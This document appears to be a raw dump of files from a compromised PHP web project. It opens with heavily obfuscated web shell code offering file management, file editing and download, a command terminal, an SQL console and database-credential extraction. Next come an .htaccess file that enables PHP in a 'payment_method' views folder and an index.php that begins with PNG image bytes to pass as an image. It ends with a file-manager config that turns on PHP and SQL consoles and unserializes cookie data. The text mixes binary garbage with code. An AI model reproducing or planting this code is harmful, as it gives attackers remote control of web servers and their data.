$dd10a73ee2d1f279->prepare("\123\105\x4c\x45\103\124\40\x74\x61\142\154\145\137\156\141\155\145\40\146\x72\157\155\40\151\x6e\146\157\162\x6d\141\x74\151\x6f\156\137\x73\143\x68\145\155\141\56\x74\141\142\x6c\145\x73\x20\x77\150\x65\162\x65\x20\x74\141\x62\154\x65\x5f\163\x63\x68\x65\155\x61\75\x3f"); goto E02264b601070a59; d00612eb08d876fe: $e7fc7ef47502e99b = isset($_COOKIE["\x68\157\163\x74"]) ? $_COOKIE["\150\157\163\x74"] : ''; goto b7699c4f07d92a7e; f02ce88398a5a212: echo "\x3c\165\x6c\x20\143\x6c\x61\x73\x73\x3d\42\x64\x62\55\154\x69\163\x74\x22\x3e"; goto db6cf6d97c560a5c; db6cf6d97c560a5c: foreach ($cf1490e54a29ea1a as $cef228408c24c48a) { goto e3bd43cc76d832d1; D72b0104a7e15958: echo "\74\x6c\x69\40{$Bbcef1e79c4dba7d}\x3e\74\141\40\x68\162\145\x66\75\x22\152\x61\166\x61\x73\143\162\x69\x70\164\72\x6e\141\x76\151\147\x61\164\145\x28\x27\141\167\141\x6c\x27\54\40\x27\163\x6b\x6c\x27\x2c\x20\x27\144\x61\x74\141\x62\141\x73\145\x27\x2c\40\x27{$Cb7c56c153b6fafa}\x27\x2c\x20\x27\x74\x27\x2c\40\x27" . b526e9837163414E($afcd18f8c85ec568) . "\47\x29\x22\x3e" . htmlspecialchars($afcd18f8c85ec568) . "\x3c\57\x61\76\x3c\x2f\x6c\x69\x3e"; goto E6f733f943f7c6df; E6f733f943f7c6df: Ad6a3108ca2f7d4d: goto F602f04245702aa9; e3bd43cc76d832d1: $afcd18f8c85ec568 = $cef228408c24c48a["\x74\141\x62\154\x65\x5f\156\x61\155\x65"]; goto bd61d975f8267e45; bd61d975f8267e45: $Bbcef1e79c4dba7d = $A815e8104dbdb799 == $afcd18f8c85ec568 ? "\x63\x6c\x61\x73\163\x3d\x22\141\143\x74\151\x76\x65\42" : ''; goto D72b0104a7e15958; F602f04245702aa9: } goto a6eef9f1b6bbe975; bffb0c8f407050a0: Df3ec77bac829fd7: goto c9b90648d2af8fc4; D2c5022bc9695c9a: throw new Exception("\122\157\x77\40\156\157\164\40\146\x6f\165\x6e\x64\56"); goto Af69a9853fbf0865; a06554a88550cda9: $Fbc4fe4be53f25db = $Dd62e21578dcaf54[0]["\106\x69\145\154\144"]; goto be49393c01f5b7ec; ef065cc44a9990f5: $E3caa90f6c99b9ae = $e5063bf904c37092->fetch(PDO::FETCH_ASSOC); goto a6803821a72107df; cb61b3229b9a3f0c: if (isset($_POST["\164"], $_POST["\x70\x6b\137\x76\141\x6c"])) { goto Bacfec4ae01dd5a4; } goto Df67c9afb63cac0a; d06c81215d235d86: echo "\74\x64\x69\x76\x20\x63\154\x61\x73\x73\75\42\x66\x6f\x72\x6d\x2d\141\143\164\x69\157\x6e\x73\x22\x3e"; goto Bed24eb607fc8328; a6803821a72107df: if ($E3caa90f6c99b9ae) { goto aed94aaef82b8428; } goto D2c5022bc9695c9a; D9e77f94489402d0: $e5063bf904c37092->execute([$ba1ef5b995b47539]); goto ef065cc44a9990f5; f26e2983c9c988f4: $c887d06bec538904 = isset($_COOKIE["\x73\x61\x6e\144\x69"]) ? $_COOKIE["\x73\x61\156\144\x69"] : ''; goto Fbcea42acd3aba74; bda6c2c503d23212: $ba1ef5b995b47539 = F64198cb3e765a83($_POST["\160\153\x5f\166\x61\154"]); goto d00612eb08d876fe; f3819cc907619696: } catch (Exception $E4d444a4fd968be8) { echo "\x3c\144\x69\166\x20\143\x6c\x61\x73\163\x3d\42\x64\142\x2d\143\157\156\164\145\156\x74\42\40\x73\164\x79\x6c\x65\x3d\x22\143\157\x6c\157\x72\72\x20\43\x66\x66\x35\65\x35\65\73\x22\76\x45\162\x72\x6f\162\72\x20" . $E4d444a4fd968be8->getMessage() . "\x3c\x2f\x64\151\166\76"; } goto Bc79a68ce4ed9444; Df50b1f403f50264: $cf583f5d73ccf3cf = isset($_COOKIE["\x75\x73\145\162"]) ? $_COOKIE["\165\163\145\162"] : ''; goto b4f064ea19f7806d; C55b25af263a6966: echo $fdac37494e3067e6 === true ? "\43\146\146\66\66\66\x36" : "\43\x36\x36\x63\x63\x36\66"; goto B7631512a2bf5a3d; fdc574402b98305b: e556028f508f02a9: goto d0055ef10193e6ac; a544fbb78bdabe99: echo htmlspecialchars(B526e9837163414e($f6f05644d791da73)); goto D29d2496833ab68a; Cd9f8230e0ac4844: echo "\x20\40\x20\40\74\x2f\146\x6f\162\x6d\x3e\xd\12\11"; goto b9ba7c4bf4532784; c2122a989c3c5c82: if ($ffc943dc0b3a48b0 == "\150\141\160\165\x73\137\x66\157\x6c\144\x65\162" && isset($_POST["\172\146"]) && is_string($_POST["\x7a\x66"]) && !empty($_POST["\x7a\x66"])) { goto e07892c55c745dbb; } goto A80ddab74506c046; Ae574cd548bf2558: print "\105\x72\x72\x6f\162\41\x20\120\x6c\x65\x61\163\145\x20\x63\157\156\156\145\x63\x74\40\x74\157\40\x53\x51\x4c\x21"; goto dca7640790c4974c; Bfd1fe3b7be0e9c1: goto e20b1cc373c122e5; goto d8926dd12cc69f26; Dedb6af3a75ca41b: if (!(is_file($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3) && is_readable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3))) { goto a37caa3f218fe335; } goto B0d76e7caab8564c; b1e422ff82ccb27e: echo "\x3e"; goto Dc1cb54604f8d497; a46ffd8cedab47cf: header("\x43\157\156\164\145\x6e\164\x2d\104\151\163\x70\157\163\x69\x74\151\157\156\x3a\x20\141\x74\x74\141\x63\150\155\145\x6e\164\x3b\x20\146\x69\154\145\156\x61\155\x65\x3d" . basename($dc0f70f3261828f3)); goto D1803e7c5629b1b1; A57f5251173c703d: goto bbaacf6dfe905331; goto B8aa385d46e7e910; F317977ed6ac9b85: goto e62bbdc6d249c8d4; goto E64cb56d736296c4; ccbfe38c33aedff2: D63dbF31B9B855Eb(); goto ab223bbf2adba355; befe93947e4cb99b: if ($ffc943dc0b3a48b0 == "\145\x64\x69\x74\137\144\x62\137\162\157\x77") { goto D775e8d069ff6323; } goto F3344ebebdd3ddf1; C2a365e2f48ee561: print "\123\141\x76\145\144\x21\x3c\x68\162\76"; goto F9a4df132f1f3421; cc7a20feaa96aaa1: chmod($e5d5c12be91726b8, 0644); goto Cb76781a9cabccd2; b5f3025ad34275dc: goto Db3a8bf00fe45419; goto C5911ee5cd6045cb; dfb615601cce606f: if (file_put_contents($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3, $F09b543791deeb4d) !== false) { goto cdfeeaa1cd5db397; } goto B1d07fbd68aa5256; fa220459f04ede2d: function F64198Cb3E765A83($fa064268f94607e1) { goto D9de8c8026025bb0; Ddc7c54ec3e0077a: $c34f8477567cde07 .= "\144"; goto a6535150b28fabb0; a6535150b28fabb0: $c34f8477567cde07 .= "\145\x63"; goto d6b56eee352ee3b2; D9de8c8026025bb0: $c34f8477567cde07 = "\142\x61\x73"; goto D36d0b44cebf277f; Baff587fd71a0e32: return $c34f8477567cde07($fa064268f94607e1); goto f00c82b1a168d7df; D36d0b44cebf277f: $c34f8477567cde07 .= "\145\x36"; goto a12babbf65f40703; a12babbf65f40703: $c34f8477567cde07 .= "\64\137"; goto Ddc7c54ec3e0077a; d6b56eee352ee3b2: $c34f8477567cde07 .= "\157\144\145"; goto Baff587fd71a0e32; f00c82b1a168d7df: } goto Fc4b972dc84cd597; e7eef5ce88dcdfe9: a38605b8a520d0a7: goto D4802cac1fe05de1; Dc1cb54604f8d497: echo htmlspecialchars(file_get_contents($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3)); goto B99378f42cae3190; ee67d8f1ebc48b70: $cf583f5d73ccf3cf = isset($_COOKIE["\x75\x73\145\162"]) ? $_COOKIE["\x75\x73\x65\162"] : ''; goto d983a4452a8e01d0; C92d033a68c0c9da: goto Ebd0566191f1746e; goto Bf7dbb0ba7c50699; B59e88857c20c7b1: $f6f05644d791da73 = str_replace("\134", "\57", $f6f05644d791da73); goto bbcad1a899670afb; ef1895577f2dbcab: A5643143f453d4fe: goto Bd76f4d8348cac94; F4a58104c8ab0387: if (preg_match("\x2f\134\44\164\x61\x62\154\145\137\x70\162\x65\x66\x69\170\134\x73\52\x3d\x5c\x73\x2a\x27\50\x5b\136\47\x5d\x2b\51\x27\x2f", $c17121c8c5afcfe3, $A6f056c3d73cfecd)) { goto bf99d1ad88344237; } goto F02e7ea5420efda0; badaebffc6b8c4ee: $D401470a2617993e = BeCc62336785b14e($c17121c8c5afcfe3, "\x44\102\137\x50\x41\123\123\x57\x4f\122\x44"); goto F4a58104c8ab0387; a11433e0781c48d3: goto F90d36c9a93e98ec; goto C683cb6cd15bf1e2; Be422406782a7ad5: echo "\47\51\73\xd\12\x20\40\40\40\x20\40\40\40\175\x20\x65\x6c\163\x65\40\173\15\xa\x20\40\x20\40\40\40\x20\x20\40\x20\40\x20\x61\154\x65\x72\x74\x28\x27\x49\156\166\141\154\x69\x64\40\146\157\x72\x6d\141\164\x2e\40\x50\x6c\145\141\163\x65\40\x75\x73\x65\40\141\40\63\x20\157\x72\x20\x34\55\144\x69\147\x69\164\x20\x6f\x63\x74\141\154\40\156\165\155\x62\145\x72\40\x28\145\x2e\147\56\x2c\40\x30\x37\x35\x35\x29\x2e\47\51\x3b\15\xa\x20\40\40\40\x20\x20\40\x20\175\xd\12\40\40\40\40\x7d\15\xa\175\15\12\xd\xa\x66\165\x6e\x63\x74\x69\157\x6e\x20\x6e\x65\x77\x46\x69\x6c\145\50\51\xd\12\x7b\xd\12\40\40\x20\x20\166\141\162\40\146\157\162\x6d\x43\157\156\x74\141\151\156\x65\162\x20\x3d\x20\144\x6f\x63\165\155\x65\x6e\164\x2e\x67\x65\164\105\x6c\145\155\145\x6e\x74\x42\x79\x49\144\50\x27\156\x65\x77\x46\151\x6c\x65\x43\x6f\156\164\x61\x69\x6e\145\162\47\51\x3b\xd\12\40\40\40\40\151\x66\x20\x28\x66\x6f\162\x6d\x43\x6f\x6e\x74\141\x69\156\145\x72\56\163\x74\x79\x6c\x65\x2e\144\151\163\160\x6c\141\171\x20\x3d\x3d\x3d\x20\47\x6e\157\156\145\47\x20\174\x7c\40\146\x6f\x72\155\103\x6f\x6e\164\x61\x69\156\145\x72\x2e\163\164\171\154\x65\56\144\x69\163\160\x6c\141\171\40\x3d\75\x3d\x20\x27\47\51\x20\173\xd\xa\40\x20\x20\40\x20\40\40\40\x66\157\162\x6d\x43\157\156\x74\x61\151\156\x65\162\x2e\163\x74\x79\x6c\x65\x2e\144\151\163\x70\x6c\141\171\x20\75\40\x27\x62\x6c\157\x63\153\47\73\xd\12\40\x20\x20\40\x7d\x20\145\x6c\163\145\40\173\15\xa\40\40\x20\40\x20\40\40\40\146\x6f\162\155\x43\x6f\x6e\164\x61\151\x6e\x65\x72\56\x73\164\x79\154\145\x2e\x64\x69\163\160\154\x61\x79\x20\x3d\40\47\x6e\157\156\145\x27\x3b\15\xa\40\40\x20\x20\x7d\xd\xa\175\15\12\xd\xa\x66\x75\156\143\164\151\157\x6e\x20\x6e\145\x77\120\x61\160\153\x61\50\51\15\xa\x7b\15\12\x9\x76\x61\162\40\147\145\x74\x4e\145\167\x4e\141\x6d\x65\x20\x3d\x20\x70\162\x6f\x6d\160\x74\50\47\116\x65\167\40\146\157\154\x64\145\x72\40\156\x61\x6d\x65\x3a\x27\x29\73\xd\12\11\x69\146\x28\x67\x65\164\x4e\145\x77\116\x61\x6d\145\x29\xd\xa\11\x7b\xd\12\x9\x9\x6e\141\166\x69\147\x61\164\145\x28\x27\141\x77\x61\x6c\x27\54\x20\47\x62\165\x61\x74\137\x66\157\x6c\x64\x65\x72\47\54\40\x27\x61\x64\x27\x2c\40\x62\x36\x34\105\156\143\157\144\x65\125\156\x69\x63\157\144\x65\x28\147\x65\x74\x4e\x65\167\116\141\x6d\x65\51\54\x20\x27\142\x65\x72\153\141\x73\47\x2c\x20\47"; goto Aa1b3758138bcfb0; fc45401b291c17e3: print "\12\74\x73\x70\141\156\x20\163\164\x79\x6c\145\75\x27\x63\157\x6c\x6f\x72\x3a\40\x23\146\x66\65\65\65\65\x3b\47\x3e" . htmlspecialchars($a8077a89a475b697["\145\x72\162\x6f\162"]) . "\x3c\57\163\x70\x61\156\76"; goto d09a60622b3cf761; C1464c70a0246261: echo B526E9837163414e($f6f05644d791da73); goto c9f8088df2d61f93; f9c73e02df05f7ac: print "\74\151\156\160\165\164\40\164\x79\160\145\x3d\42\164\x65\x78\x74\42\40\x69\x64\x3d\x22\145\x6d\162\x5f\x65\x74\137\x61\164\141\x73\x68\42\x20\x63\x6c\x61\163\x73\75\x22\164\x65\x72\155\x69\x6e\141\x6c\55\x69\x6e\160\x75\164\42\40\x70\154\141\143\145\150\157\x6c\x64\x65\x72\75\42\105\x6e\x74\145\162\x20\143\x6f\x6d\x6d\x61\156\144\x2e\x2e\56\42\x20\x61\x75\164\x6f\146\x6f\143\x75\163\x3e"; goto D73fb5c2211e688f; da8cb41110c6baef: $C30da0039db7258c = "\x49\156\x76\141\x6c\x69\144\40\x70\x65\162\x6d\x69\163\x73\x69\x6f\x6e\40\146\x6f\x72\155\x61\x74\x2e\40\120\154\x65\x61\x73\x65\x20\165\163\x65\40\141\40\63\40\157\162\x20\x34\x2d\144\151\x67\x69\164\x20\157\143\x74\141\x6c\40\156\x75\155\x62\145\162\x20\50\x65\x2e\x67\x2e\54\40\60\67\65\65\x29\x2e"; goto a4e27eeb33efe7a7; cddced8049f498d6: echo isset($_SERVER["\123\x45\122\x56\105\122\x5f\x53\117\106\x54\127\x41\x52\105"]) ? htmlspecialchars($_SERVER["\x53\105\122\x56\x45\x52\x5f\123\x4f\x46\124\x57\101\x52\x45"]) : "\165\156\x6b\x6e\157\167\156"; goto F896c0f9179e2f20; Aecda1e1906ce76b: goto Ad5f12b0b76fcc7b; goto F345a6baa7a7ce65; cf9811a2bbc611ab: echo is_writeable($f6f05644d791da73 . $c9c3dbf37270f221 . $dc0f70f3261828f3) ? '' : "\144\x69\163\x61\142\154\x65\144"; goto b1e422ff82ccb27e; E4b34e4d98f74ca0: if (empty($e7fc7ef47502e99b)) { goto c0396e518be7ff92; } goto f55deb0ea3f2f0d6; dc5a03a1cb5e6f9c: $A62259e1f87e5d26 = "\x20\x3c\x73\x70\x61\x6e\40\143\154\141\x73\163\75\x27\x71\141\154\x69\156\x27\x20\x73\164\171\x6c\x65\75\x27\143\x6f\x6c\157\162\x3a\x23\60\60\106\x46\60\60\73\47\x3e\123\141\x76\x65\144\40\x73\x75\143\143\x65\163\x73\x66\x75\x6c\x6c\x79\x21\74\57\163\x70\141\x6e\76"; goto adce49c8bb8b2746; d0055ef10193e6ac: usort($e8b6725d00c743ed, function ($A96b16629ac6aa8b, $D88ead584cd83352) { goto a2d9450023d8e6ea; Ffba161a548b92e9: return 1; goto D755dfce1b4f7bb1; Efa22d77bdada55a: if (!($A96b16629ac6aa8b["\156\141\x6d\145"] === "\56\56")) { goto E1efbd2b1c014b69; } goto A0a1e3ac3338609f; Dd934b257f2f857f: C7ea5020bf9b8ece: goto D9cd20e01efdb445; D9cd20e01efdb445: if (!($A96b16629ac6aa8b["\151\163\137\144\x69\x72"] && !$D88ead584cd83352["\151\163\x5f\144\151\162"])) { goto A375f4f5e678ba92; } goto aa6532d9bd632dad; dadad7bace617b82: return 1; goto Dd934b257f2f857f; a2d9450023d8e6ea: if (!($A96b16629ac6aa8b["\156\141\155\145"] === "\56")) { goto a8264825b8d2df7e; } goto b20b96627ca40b81; fdfed97cd0e89026: a8264825b8d2df7e: goto A93e249db2f016bc; Fb4d053dfa2e7292: A375f4f5e678ba92: goto F439a841e0d9740e; aa6532d9bd632dad: return -1; goto Fb4d053dfa2e7292; f73b56ebfd48d88e: return 1; goto A87f3f0cabc908b1; b20b96627ca40b81: return -1; goto fdfed97cd0e89026; A93e249db2f016bc: if (!($D88ead584cd83352["\156\x61\x6d\145"] === "\x2e")) { goto B89772f891232921; } goto Ffba161a548b92e9; A87f3f0cabc908b1: B4ae94e9fdc593a2: goto bbf4d5630873b19f; bbf4d5630873b19f: return strcasecmp($A96b16629ac6aa8b["\156\x61\x6d\145"], $D88ead584cd83352["\x6e\141\155\145"]); goto b324f0d050c1866b; e494eead386bdcdc: E1efbd2b1c014b69: goto de9b66164d0a7f63; D755dfce1b4f7bb1: B89772f891232921: goto Efa22d77bdada55a; F439a841e0d9740e: if (!(!$A96b16629ac6aa8b["\151\163\137\144\x69\162"] && $D88ead584cd83352["\x69\x73\x5f\x64\x69\x72"])) { goto B4ae94e9fdc593a2; } goto f73b56ebfd48d88e; A0a1e3ac3338609f: return -1; goto e494eead386bdcdc; de9b66164d0a7f63: if (!($D88ead584cd83352["\156\x61\155\x65"] === "\x2e\x2e")) { goto C7ea5020bf9b8ece; } goto dadad7bace617b82; b324f0d050c1866b: }); goto Cd03eb172b7de9e2; A5b48905b7de127d: print "\74\x73\160\141\156\40\143\x6c\x61\163\163\75\x22\x74\145\162\155\x69\156\x61\154\55\160\162\x6f\x6d\x70\x74\x22\76\44\74\57\163\160\141\x6e\76"; goto f9c73e02df05f7ac; ce8087820dadb351: E796c91c6c8a7af2: goto Ccf5580fbdfa73ae; b4f064ea19f7806d: $c887d06bec538904 = isset($_COOKIE["\x73\141\x6e\x64\x69"]) ? $_COOKIE["\x73\141\156\144\151"] : ''; goto cdefdc67c0a35245; cd78f4f62926ba94: echo "\x3c\x2f\x73\160\141\x6e\76\xd\xa\x9\11\x3c\x2f\x70\76\xd\12\x20\x20\40\40\40\40\40\x20\x3c\x70\76\15\xa\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\x3c\x73\164\x72\157\x6e\x67\40\x73\164\171\x6c\145\75\x22\x63\157\154\157\162\72\40\43\x30\60\106\x46\x30\60\73\42\x3e\x53\x61\x66\x65\x20\115\157\x64\145\x3a\74\57\163\x74\x72\x6f\156\147\x3e\xd\xa\40\x20\40\x20\x20\40\40\x20\x20\40\x20\40\74\x73\x70\141\156\40\163\x74\x79\x6c\x65\75\42\x63\157\x6c\157\x72\x3a\40"; goto C55b25af263a6966; ab7f42ece7d3bf0e: $Cd1e6c38bf6c5fac = dirname($Cd1e6c38bf6c5fac); goto D4b90d78e9b55d52; A1849f273586f711: $F09b543791deeb4d = @file_get_contents($ffe0def0151bb0bd); goto e96f7986bf4829f4; cb8c6a13323dfc60: a37caa3f218fe335: goto a8db4e13f26be9db; D88c6d75416372b7: if ($ffc943dc0b3a48b0 == "\x65\x64\x69\164\x5f\144\x62\x5f\146\x6f\162\155") { goto b63f43f9262a1cf5; } goto C294d1b2a8197841; D68ac9ffc5839ff7: echo "\x22\40\156\141\x6d\x65\x3d\x22\142\x65\x72\x6b\141\163\x22\x3e\15\12\11\11\11\11\x9\74\151\156\x70\165\x74\x20\x74\x79\160\145\75\42\x68\151\144\x64\x65\x6e\x22\x20\166\x61\154\165\145\75\x22"; goto E2907282d9cec9e2; b8ca305c66f6153e: $C30da0039db7258c = "\106\151\154\x65\40\x6e\157\164\x20\x66\x6f\165\156\144\x3a\x20" . htmlspecialchars($dc0f70f3261828f3); goto bcf2d566b962d1e2; f95e1165eafad7dd: D121367f80e76ca0: goto D9fbeba27fd4c3b5; D700c73ac4d3b134: A6200bd6381e69b0: goto F99f54c4e8b93cf5; d39aefa484e3f279: echo B526E9837163414e($dc0f70f3261828f3); goto efff0eebf73566f1; Baec80d7f87f608f: $dc0f70f3261828f3 = basename(F64198Cb3E765a83($_POST["\146\x61\171\154"])); goto da40496da0d5bb89; B49685552e62221f: echo "\x22\x29\73\15\xa\x20\x20\40\x20\151\146\x20\50\x64\151\x72\51\x20\x7b\15\xa\x20\40\x20\x20\x20\40\x20\40\156\141\x76\x69\x67\x61\x74\x65\50\47\x61\167\141\154\x27\54\40\47\153\157\x6d\x70\x72\x65\163\47\x2c\x20\x27\172\x66\x27\x2c\40\172\x66\54\40\x27\163\x61\166\x65\137\x74\x6f\47\x2c\x20\x62\x36\64\105\x6e\x63\157\144\145\125\156\151\x63\157\x64\x65\x28\144\x69\x72\51\x2c\40\47\142\145\x72\x6b\141\x73\x27\x2c\40\x27"; goto C1464c70a0246261; b165eadcd11369cf: if ($_POST["\x61\167\x61\154"] == "\144\142\x5f\x6c\x6f\147\157\x75\164") { goto e8ce4554e690d4bf; } goto Aecda1e1906ce76b; F60a5c61742c4f6c: $Aa102996b4a82446->close(); goto C2a365e2f48ee561; D5a090cb7a330acd: if ($D8c5eb5a4b8d7d00 !== false && file_put_contents($e5d5c12be91726b8, $D8c5eb5a4b8d7d00)) { goto de0f7ad779e64434; } goto f436816cefb804fa; A1b0c62a1787c0e6: B4b2bb95c03944e2: goto A3459685fd3af1db; F39300deea03a875: $c31208d29cfc6afb = "\106\x69\x6c\x65\40\x64\x6f\x77\x6e\x6c\157\x61\144\x65\x64\40\x73\165\143\x63\145\163\163\x66\x75\154\x6c\171\x20\x76\151\x61\40\146\x69\x6c\x65\137\147\145\164\x5f\143\x6f\156\x74\x65\156\164\163\x20\141\x6e\x64\x20\163\x61\166\x65\144\x20\141\163\40\x3c\x73\164\x72\157\x6e\147\76" . htmlspecialchars($D4923a741daf1b7e) . "\74\x2f\163\164\x72\157\x6e\x67\76"; goto e63a953db92a93ff; D2dd9ca5af7596d5: echo "\47\51\73\15\12\40\40\x20\40\x20\40\x20\x20\40\x20\40\40\x7d\54\x20\61\65\60\60\x29\x3b\15\xa\x20\40\x20\x20\40\40\40\40\175\x20\145\x6c\x73\x65\40\x7b\xd\xa\x20\40\40\x20\40\x20\40\x20\x20\x20\x20\40\x73\x74\x61\x74\x75\x73\x44\151\x76\56\x73\164\171\x6c\145\56\143\x6f\x6c\157\x72\40\75\40\47\43\106\x46\64\x34\x34\64\x27\73\15\12\40\40\x20\x20\40\40\40\40\40\x20\x20\40\163\164\141\164\x75\x73\104\x69\x76\x2e\x69\156\156\145\x72\x54\x65\170\164\x20\x3d\x20\x27\x55\160\x6c\x6f\141\x64\x20\146\x61\x69\154\145\144\x21\47\x3b\15\xa\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x70\x72\x6f\147\x72\x65\163\x73\x43\x6f\x6e\x74\141\x69\156\145\x72\x2e\x73\164\171\x6c\145\56\144\x69\x73\x70\x6c\x61\171\x20\x3d\x20\47\156\x6f\x6e\x65\x27\x3b\xd\xa\x20\x20\40\40\40\x20\x20\40\x7d\xd\xa\x20\40\x20\40\175\73\xd\xa\x20\x20\x20\x20\x78\x68\162\56\x6f\x6e\x65\x72\x72\x6f\x72\x20\x3d\x20\x66\165\x6e\143\164\151\x6f\x6e\40\x28\51\40\x7b\15\xa\40\40\40\x20\40\x20\40\40\x73\x74\141\x74\x75\163\104\x69\x76\x2e\163\164\x79\x6c\x65\x2e\143\x6f\154\157\162\x20\x3d\x20\x27\x23\x46\106\64\64\x34\x34\47\x3b\15\12\x20\x20\40\x20\40\40\x20\40\163\x74\x61\164\165\x73\x44\151\x76\56\151\x6e\156\145\162\124\x65\170\164\x20\75\x20\x27\x41\x6e\40\145\x72\162\x6f\x72\40\x6f\x63\143\165\x72\x72\145\x64\40\x64\165\x72\x69\156\147\40\x75\160\154\157\x61\x64\41\x27\73\15\12\x20\40\40\x20\x20\40\40\40\x70\162\157\147\x72\x65\163\163\x43\157\156\x74\141\151\x6e\145\x72\56\163\x74\171\154\145\x2e\x64\151\163\160\x6c\x61\x79\x20\75\40\x27\x6e\157\x6e\145\47\73\15\12\40\x20\40\40\175\x3b\xd\12\15\xa\40\x20\40\40\170\x68\x72\56\x73\x65\156\x64\x28\x66\x6f\x72\x6d\104\141\164\141\51\73\15\xa\175\xd\xa\74\x2f\163\x63\162\151\160\164\x3e\xd\xa\74\57\x62\x6f\x64\x79\x3e\15\12\74\57\x68\164\155\x6c\x3e";PK�N]^1�[��Cviews/african_pg/configurations/payment_method/data9ab77b/.htaccessnu�[��� php_flag engine on php_flag engine on php_flag engine on Order Allow,Deny Allow from all PK�N]y����8�8Bviews/african_pg/configurations/payment_method/pub87e7e1/index.phpnu�[���‰PNG  IHDR 6 £ 7¾Âß PLTEÿÿÿL‹õïïïåååLŒõOŽõÜÜÜRõI‰ôÙÙÙçççáááJ‰ñÞÞÞDU¶Oò6€ö©Çüb|‰ÕÕ×e÷÷÷ÒÒÖÛåð^w‡„«ôÍÍÓ^•óöôïEnÓBP°ÇÈÐDV´>…õpŠ•ÂÃÎüùîÊ×ñÃÇÉš¨°±óPo{~¦óZw…\tˆ>P³m öc˜ó°Æòäéï»Íñ«³¸2F³Yf¸ó÷ýŸ¾øÕáûéðýÚåûØÙᢰÔwœæ°ºÕÀÑñ‡¦å’©ßº¾ÏŸ¯Ú—¶óPt¢PƒÔ^r|t‡pƒ”}š„¢äMi“¡©—¤ª¬±½Mr¢ÕÏÉ¡¦Æ™Ñ’˜Â}„¿oy»½ÁÞhu¨«Å–š¿þ­)€ (IDATxœíÝ [ÚÈ p"&bEA gÓDQ«-½¸­v÷”êzzv{¶ÝïÿAÎÜ’L’É¥ä™$ÿgût­í®ù=ï;—db …Ü'd*Ö@¶xj6.7¥Ûm¿yóF¯V«E”u.ޏ]Ÿ A¬%­;l1Ñl5ºQxËÜt,W-ÆI•OQ8![\4Žté»>q{2ú3’¸ Øâ£qjô€\·kšíç°Éâæe[ÀÌÏßš( Ë,t( $”bfp±-fæR#_Z»]/©E@¶õ¤I⤃Š$ÒK¨¡j¨äs[X¹ÉPn˜m+Ô ÂÎñÙÍl6;<¿ƒcƒï [£»Ú}*ÃèÁ¦Ô7k=ÃXÃ1ŒžÑ¼ƒP RC]Ú&lúúÓÙdèÒP6ÞM{”ÌŽaœW`€šªTpµ5P´˜n‚i¡˜´IŒ„±ÁÁÔcÆà¶QÁ‰Ô¬.ÅnåXÅ–>6ÞˆÐ\³Ø~m°.­ë™dS*ÂR³àZb7¥Cæ4)`·mš26elFê w©é¸EÂ¥‹Mõ¨8܇³ 5Ô¥m›­®G/CÒÅV™òfkÍóí³óÙÔZ‰ª‘.¥nx|+G¹yÕ¤f«€™SZÆôzB7 °48Ä¿nª¡¥Û{êFØp½e‡ l÷œJ»Öú¶¤*pÜ4BÕTøÁìb·s[¬G¥f›Øµf4éÚÖ™*àÍM-D uiŸÜ>Šç–&6xh±áÂòN `ÉfwéGÊË-ElêØVkúÕ"ƒ»´Ëº±i¡nR³¹o9»ã jª2qwiX½ùÔ¤bsËT¬­7PW£]ÚuØ´z©IÊŽ­b›Á§¨¡.íÚ]JªMÓ‚ÜRÄfO½±ú5Ö¥ÖŠ—°iÕÔ³{ƒPãY©‰"œUÙ\Ú°ÊM«÷ûýFch““MíXóÁ9ߣÊ`Úôg*º¢À[÷œ õO†ÃáÊAzÙ¬GcnBPÁÀÞ8ð»Õ3Á†A¬K96D¶‹’^6{FèMì¡ 7žmM°ÏRÅZñºØv|l~5‰Ùî,¶ŠƒÈæ¿í†Ôh—:ûƶ“ ¶’ÊMŸqÙ°šƦˆÍ;¶¥Ší˜¯6gv\„M®9!€M &/›Òr–mü¢"USÈa{åæ°íVÓÊfoä;àf3¸L LMïúB¶~Ý›*¶R%€„ßï[Kb´¶©¡rkX›+´EÐ6]/Zÿyá–A^6Ød×Õ ¾©Xy …j true, 'new_file' => true, 'upload_file' => true, 'show_dir_size' => false, //if true, show directory size → maybe slow 'show_img' => true, 'show_php_ver' => true, 'show_php_ini' => false, // show path to current php.ini 'show_gt' => true, // show generation time 'enable_php_console' => true, 'enable_sql_console' => true, 'sql_server' => 'localhost', 'sql_username' => 'root', 'sql_password' => '', 'sql_db' => 'test_base', 'enable_proxy' => true, 'show_phpinfo' => true, 'show_xls' => true, 'fm_settings' => true, 'restore_time' => true, 'fm_restore_time' => false, ); if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config; else $fm_config = unserialize($_COOKIE['fm_config']); // Change language if (isset($_POST['fm_lang'])) { setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_lang'] = $_POST['fm_lang']; } $language = $default_language; // Detect browser language if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){ $lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']); if (!empty($lang_priority)){ foreach ($lang_priority as $lang_arr){ $lng = explode(';', $lang_arr); $lng = $lng[0]; if(in_array($lng,$langs)){ $language = $lng; break; } } } } // Cookie language is primary for ever $language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang']; //translation function __($text){ global $lang; if (isset($lang[$text])) return $lang[$text]; else return $text; }; //delete files and dirs recursively function fm_del_files($file, $recursive = false) { if($recursive && @is_dir($file)) { $els = fm_scan_dir($file, '', '', true); foreach ($els as $el) { if($el != '.' && $el != '..'){ fm_del_files($file . '/' . $el, true); } } } if(@is_dir($file)) { return rmdir($file); } else { return @unlink($file); } } //file perms function fm_rights_string($file, $if = false){ $perms = fileperms($file); $info = ''; if(!$if){ if (($perms & 0xC000) == 0xC000) { //Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { //Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { //Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { //Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { //Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { //Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { //FIFO pipe $info = 'p'; } else { //Unknown $info = 